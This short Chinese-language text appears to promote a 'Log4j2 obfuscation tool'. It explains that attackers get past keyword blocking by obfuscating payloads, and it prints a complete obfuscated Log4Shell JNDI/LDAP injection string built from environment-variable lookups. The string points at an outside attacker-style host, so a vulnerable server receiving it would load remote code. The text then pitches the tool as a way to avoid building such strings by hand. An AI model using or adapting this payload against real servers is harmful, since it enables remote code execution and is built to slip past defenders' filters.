Log4j2混淆工具 许多开发人员开始屏蔽关键字以保护应用程序。 但是,攻击者可以使用混淆方式来进行绕过。 最常用的为系统环境变量绕过: ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z} 手动替换字符无疑是一项大工程,耗时耗力又容易出错。 Log4j2混淆工具